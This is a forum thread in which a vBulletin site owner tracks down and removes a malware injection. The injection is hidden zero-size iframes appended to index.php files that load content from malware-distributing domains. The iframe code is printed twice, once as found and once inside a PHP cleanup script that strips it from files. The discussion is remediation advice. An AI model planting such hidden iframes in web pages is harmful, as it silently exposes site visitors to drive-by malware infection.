I think the title shows all. My forum, http://www.adminfuel.com, gives the error that some sort of malware is present. However, I cannot find anything to do with this. Are there certain areas I should check?

Thanks

Let me install my AV and i'll tell you. Lol

Haha.. thanks :)

No problem, but one thing I'd suggest, check your index.php and global.php files. If there's something there at the top besides /*=========*\||vbstuff||etc.. then delete it.

Thanks, I had a look, and there was nothing there BUT I had a look at the end of the index.php file and I found an iframe after the PHP tag closes:

<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I have removed this, that the right thing?

That wouldn't do anything anyways. print_output() on that last eval() code disables any further code to be printed.

First of all, I'd suggest you upgrade to at least 3.8.3.

I do not see any suspicious code besides that one in the source, but in Firefox, your style is broken due to the "Reported Attack Site" window. I had to switch to IE8 for viewing your site.
Even in IE8, it doesn't show up. I also used w3 validator.

Been on holiday so couldn't update. Doing now, bit annoying with the error, but I am submitting to Google to recheck.

rockinaway, at this point I'd have to suggest this:

For security reasons, I'd contact your hosting provider. (Which, according to Google, is Dreamhost?) You should contact them and request that they do a security audit on the server you're located on.

You should change your passwords to something more secure. (eg: cv%3m2Fwe!@#.RE - but note that you'll need to remember the password [clearly, lol])

You should run the vBulletin "Suspect File Versions" script via the administrator control panel.
To do this, go to:
Admin CP > Maintenance > Diagnostics > Suspect File Version

Once that has been completed, if you could screenshot the page (or in firefox, use Screengrab and save/upload the entire frame) I'd try and tell you what to look for.

I am on 3.8.1 now, if I want to update to the latest 3.8.4, which security patch would I download? I can't figure it out, haha... forgotten everything.

Before, I noticed a strange address appear when page loads, but now I don't see that. I wiill still contact my hosting provider.

Just download vBulletin as if you were downloading a new install. vBulletin Members Area - across from the same license for the board you're attempting to upgrade is a "Download vBulletin" and "Download ImpEx" link. The vB one is the one you want to click :p

Even so, contacting your host and making sure there were no exploited services, up-to-date software, etc is all running fine, then it could be determined to a XSS flaw of some sort, or php script that is on the server.

Okay, doing that. How can I detect any malware or suspicious code? Any program?

Personally I just do it manually. Sometimes things are better off done by hand than by program.

Okay, thanks for help so far. I am updating now, and have emailed host. I have also submitted site for reviewing by Google.

Right, a look at the Google report.

Malicious software includes 1 trojan(s). Successful infection resulted in an average of 6 new process(es) on the target machine.

Malicious software is hosted on 8 domain(s), including odmarco.com/, 92.38.0.0/, go00ogle.net/.

3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including odmarco.com/, s100.ucoz.ru/, goldtraff.info/.

The odmarco has been removed, not sure about the others.

--------------- Added 1251049948 at 1251049948 ---------------

Forum is updated, now looking into other problems.

When the page loads, an odmarco link still loads, not sure where to search for it.

--------------- Added 1251050426 at 1251050426 ---------------

Update: turns out many dreamhost people have had a problem. The script injects a line of code to nearly every index.php/html file accessible. There are some scripts to remove this, so I am working on it.

--------------- Added 1251052649 at 1251052649 ---------------

Okay, I need to edit this code so that it searches in EVERY html file and every folder and file to remove the line:

<?php

$clear = new clearOdmarco(getcwd());
$clear->main();
class clearOdmarco
{
protected $path;
protected $string_to_clear = '<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
public function __construct($path)
{ $this->path = $path;
}
public function main()
{
$this->checkDir($this->path);
}

protected function checkDir($path)
{
$dir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
echo "PARSING " . $dir->getFileName() . "\n";

foreach ( $dir as $current )
{
if ($current->isFile())
{
$this->clearFile($current->getPath() . '/' . $current->getFileName());
}
}
}

protected function clearFile($file)
{
echo 'checking ' . $file . "\n";
$contents = file_get_contents($file);
if (strpos($contents, 'odmarco'))
{
echo "FOUND string, cleaning\n";
$clean_contents = $this->clean($contents);
if (file_put_contents($file, $clean_contents))
{
echo "WRITTEN clean file contents\n";
} else
{
echo "COULD NOT WRITE " . $file . "\n";
}
}
}

protected function clean($string)
{
$clean_contents = str_replace($this->string_to_clear, '', $string);
return $clean_contents;
}
}


--------------- Added 1251053592 at 1251053592 ---------------

Think I have got rid of it, please tell me if otherwise.